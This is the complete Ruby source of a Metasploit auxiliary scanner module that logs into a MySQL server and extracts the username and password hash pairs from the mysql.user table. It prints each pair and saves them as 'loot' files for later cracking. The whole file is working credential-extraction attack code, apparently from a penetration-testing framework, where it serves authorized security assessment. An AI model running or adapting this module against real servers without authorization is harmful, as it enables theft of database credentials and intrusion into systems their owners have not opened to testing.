metasploit-framework/modules/auxiliary/scanner/mysql/mysql_hashdump.rb

86 lines
2.0 KiB
Ruby

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MYSQL
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'MYSQL Password Hashdump',
'Version' => '$Revision$',
'Description' => %Q{
This module extracts the usernames and encrypted password
hashes from a MySQL server and stores them for later cracking.
},
'Author' => ['TheLightCosine <thelightcosine[at]metasploit.com>'],
'License' => MSF_LICENSE
)
end
def run_host(ip)
if (not mysql_login_datastore)
print_error("Invalid MySQL Server credentials")
return
end
#Grabs the username and password hashes and stores them as loot
res = mysql_query("SELECT user,password from mysql.user")
if res.nil?
print_error("There was an error reading the MySQL User Table")
return
end
this_service = report_service(
:host => datastore['RHOST'],
:port => datastore['RPORT'],
:name => 'mysql',
:proto => 'tcp'
)
#create a table to store data
tbl = Rex::Ui::Text::Table.new(
'Header' => 'MysQL Server Hashes',
'Indent' => 1,
'Columns' => ['Username', 'Hash']
)
if res.size > 0
res.each do |row|
tbl << [row[0], row[1]]
print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}")
end
end
report_hashes(tbl.to_csv, this_service) unless tbl.rows.empty?
end
#Stores the Hash Table as Loot for Later Cracking
def report_hashes(hash_loot,service)
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_mysqlhashes.txt"
path = store_loot("mysql.hashes", "text/plain", datastore['RHOST'], hash_loot, filename, "MySQL Hashes",service)
print_status("Hash Table has been saved: #{path}")
end
end